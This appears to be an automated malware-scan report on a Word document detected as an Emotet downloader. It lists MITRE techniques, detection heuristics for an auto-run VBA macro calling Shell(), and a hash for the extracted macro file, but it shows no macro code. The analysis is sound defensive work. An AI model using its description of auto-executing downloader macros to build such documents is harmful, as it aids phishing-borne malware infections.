Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro that utilizes the Shell() function, a common technique for executing arbitrary commands. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet-6877417-0', strongly suggesting the Emotet family. The macro's primary function appears to be downloading and executing a secondary payload, indicated by the Shell() call and the downloader heuristic.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-6877417-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6877417-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15322 bytes |

SHA-256 (macros.bas): 1c67c395c6b927153c0f02aa898ff4e7c1260d7f5ae3796f68a37f4ef70a52c0

Preview script: first 1,000 lines of the extracted script.